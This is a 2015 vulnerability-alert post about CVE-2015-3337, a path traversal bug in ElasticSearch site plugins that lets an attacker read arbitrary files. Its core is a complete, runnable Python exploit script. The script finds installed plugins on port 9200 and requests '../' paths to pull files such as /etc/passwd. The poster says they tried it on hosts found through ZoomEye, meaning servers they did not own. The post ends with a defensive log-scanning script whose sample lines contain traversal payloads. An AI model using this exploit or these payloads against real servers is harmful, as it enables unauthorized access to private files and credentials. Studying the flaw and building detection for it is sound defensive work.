ElasticSearch local arbitrary file read vulnerability disclosed, affecting all versions before 1.4.5 and 1.5.2 - Vulnerability Alerts - Black Bar Safety Net

2015-05-23T00:00:00
ID MYHACK58:62201562759
Type myhack58
Reporter Anonymous
Modified 2015-05-23T00:00:00

Description

Recently, a directory traversal (path traversal) flaw in ElasticSearch's plug-in functionality was disclosed on exploit-db. It leads to a local arbitrary file read vulnerability and affects all versions before 1.4.5 and 1.5.2. I casually looked up a few hosts on ZoomEye and tried them, and found that the scope of impact is also quite large. Exploit (PoC):

```python
#!/usr/bin/python
# Crappy PoC for CVE-2015-3337 - Reported by John Heasman of DocuSign
# Affects all ElasticSearch versions prior to 1.5.2 and 1.4.5
# Pedro Andujar || twitter: pandujar || email: @segfault.es || @digitalsec.net
# Tested on default Linux (.deb) install /usr/share/elasticsearch/plugins/
#
# Source: https://github.com/pandujar/elasticpwn/
#
# Python 2 syntax (print statements, "except Exception, e").

import socket, sys

print "!dSR ElasticPwn - for CVE-2015-3337\n"
if len(sys.argv) != 3:
    print "Ex: %s www.example.com /etc/passwd" % sys.argv[0]
    sys.exit()

port = 9200  # Default ES http port
host = sys.argv[1]
fpath = sys.argv[2]

def grab(plugin):
    # Request the target file through the site plugin's URL prefix.
    socket.setdefaulttimeout(3)
    s = socket.socket()
    s.connect((host, port))
    s.send("GET /_plugin/%s/../../../../../..%s HTTP/1.0\n"
           "Host: %s\n\n" % (plugin, fpath, host))
    file = s.recv(2048)
    print " [*] Trying to retrieve %s:" % fpath
    if ("HTTP/1.0 200 OK" in file):
        print "\n%s" % file
    else:
        print "[-] File Not Found, No Access Rights or System Not Vulnerable"

def pfind(plugin):
    # Check whether the named site plugin is installed before calling grab().
    try:
        socket.setdefaulttimeout(3)
        s = socket.socket()
        s.connect((host, port))
        s.send("GET /_plugin/%s/ HTTP/1.0\n"
               "Host: %s\n\n" % (plugin, host))
        file = s.recv(16)
        print "[*] Trying to find plugin %s:" % plugin
        if ("HTTP/1.0 200 OK" in file):
            print "[+] Plugin found!"
            grab(plugin)
            sys.exit()
        else:
            print "[-] Not Found"
    except Exception, e:
        print "[-] Error connecting to %s: %s" % (host, e)
        sys.exit()

# Include more plugin names to check if they are installed
pluginList = ['test', 'kopf', 'HQ', 'marvel', 'bigdesk', 'head']

for plugin in pluginList:
    pfind(plugin)
```
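
A defensive counterpart to the PoC above, added here as an example (Python 3, not part of the original post or of elasticpwn): it flags requests whose `/_plugin/<name>/...` path resolves outside the plugin directory, and it goes beyond the literal `../` form shown by also covering percent-encoded and double-encoded segments. The combined-log format from a reverse proxy in front of port 9200, the function names and the sample log lines are assumptions constructed for illustration.

```python
import posixpath
import re
from urllib.parse import unquote

PLUGIN_RE = re.compile(r"^/_plugin/([^/]+)")
# Assumed combined-log format from a reverse proxy in front of port 9200.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3})')

def escapes_plugin_dir(request_path):
    """True if a /_plugin/<name>/... path resolves outside /_plugin/<name>."""
    path = request_path.split("?", 1)[0]
    for _ in range(3):  # bounded re-decoding catches %2e%2e and %252e%252e
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    path = path.replace("\\", "/")
    m = PLUGIN_RE.match(path)
    if not m:
        return False  # not a site-plugin request
    base = "/_plugin/" + m.group(1)
    resolved = posixpath.normpath(path)  # collapses "." and ".." segments
    return resolved != base and not resolved.startswith(base + "/")

def scan(lines):
    """Return (client, path, status) for each request that leaves the plugin dir."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and escapes_plugin_dir(m.group(2)):
            hits.append((m.group(1), m.group(2), int(m.group(3))))
    return hits

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [23/May/2015:10:00:01 +0000] "GET /_plugin/head/ HTTP/1.0" 200 512',
    '192.0.2.10 - - [23/May/2015:10:00:02 +0000] "GET /_plugin/head/../../../../../../etc/passwd HTTP/1.0" 200 1843',
    '198.51.100.7 - - [23/May/2015:10:05:10 +0000] "GET /_plugin/kopf/%2e%2e/%2e%2e/%2e%2e/etc/hosts HTTP/1.1" 404 0',
    '198.51.100.7 - - [23/May/2015:10:05:11 +0000] "GET /_plugin/kopf/css/../index.html HTTP/1.1" 200 900',
    '203.0.113.5 - - [23/May/2015:10:06:00 +0000] "GET /_cluster/health HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for client, path, status in scan(SAMPLE_LOG):
        # A 200 on a flagged request means file content was likely returned.
        print(client, status, path)
```

A flagged request answered with status 200 is the case to triage first, since the PoC treats `HTTP/1.0 200 OK` as a successful read.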